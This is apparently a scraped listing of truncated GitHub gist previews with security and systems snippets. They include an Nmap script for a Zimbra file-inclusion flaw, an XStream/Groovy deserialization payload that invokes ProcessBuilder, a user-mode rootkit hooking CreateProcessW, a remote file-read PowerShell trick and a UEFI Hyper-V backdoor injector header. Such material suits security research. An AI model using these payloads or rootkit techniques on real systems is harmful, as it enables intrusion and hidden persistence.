This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
local http = require "http" | |
local shortport = require "shortport" | |
local stdnse = require "stdnse" | |
local string = require "string" | |
local vulns = require "vulns" | |
description = [[ | |
A 0 day was been released on the 6th december 2013 by rubina119, and was patched in Zimbra 7.2.6. | |
The vulnerability is a local file inclusion that can retrieve any file from the server. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Compile with -std=c11 | |
#include <stdlib.h> | |
#include <stdarg.h> | |
#include <stdio.h> | |
#include <inttypes.h> | |
#include <string.h> | |
#include <limits.h> | |
#define MAX_STR_LEN 4095 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<map> | |
<entry> | |
<groovy.util.Expando> | |
<expandoProperties> | |
<entry> | |
<string>hashCode</string> | |
<org.codehaus.groovy.runtime.MethodClosure> | |
<delegate class="groovy.util.Expando" reference="../../../.."/> | |
<owner class="java.lang.ProcessBuilder"> | |
<command> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
- name: DO | |
hosts: localhost | |
vars: | |
project_name: "PUT A NAME FOR YOUR PROJECT HERE" | |
do_token: "PUT YOUR DIGITAL OCEAN API KEY HERE ==> https://cloud.digitalocean.com/settings/api/tokens" | |
repository: "PUT YOUR REPOSITORY URL HERE" | |
tasks: | |
- name: LOCAL | Generate SSH key | |
shell: ssh-keygen -b 2048 -t rsa -f ~/.ssh/{{project_name}} -q -N "" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from idaapi import * | |
# with code taken from http://hexblog.com/idapro/vmware_modules.py | |
class LoadedModulesList(Choose2): | |
def __init__(self, title, flags=0, width=None, height=None, embedded=False, modal=False): | |
self.ptr = get_name_ea_simple("PsLoadedModuleList") | |
if self.ptr == BADADDR: | |
raise ValueError('Missing symbol: PsLoadedModuleList') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <stdio.h> | |
FARPROC fpCreateProcessW; | |
BYTE bSavedByte; | |
// Blog Post Here: | |
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
// tasklist | findstr explore.exe |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* Kernel-based Virtual Machine driver for Linux | |
* | |
* This module enables machines with Intel VT-x extensions to run virtual | |
* machines without emulation or binary translation. | |
* | |
* Copyright (C) 2006 Qumranet, Inc. | |
* Copyright 2010 Red Hat, Inc. and/or its affiliates. | |
* | |
* Authors: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
""" | |
@author: John Ombagi | |
""" | |
import os | |
import sys | |
import base64 | |
import dropbox | |
import time |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$CimSession = New-CimSession -ComputerName 10.0.0.2 | |
$FilePath = 'C:\Windows\System32\notepad.exe' | |
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation. | |
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession | |
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly | |
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession | |
$FileLengthBytes = $FileContents.FileData[0..3] | |
[Array]::Reverse($FileLengthBytes) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
********************************************************************* | |
Part of UEFI DXE driver code that injects Hyper-V VM exit handler | |
backdoor into the Device Guard enabled Windows 10 Enterprise. | |
Execution starts from new_ExitBootServices() -- a hook handler | |
for EFI_BOOT_SERVICES.ExitBootServices() which being called by | |
winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi | |
transfers exeution to previously loaded Hyper-V kernel (hvix64.sys) |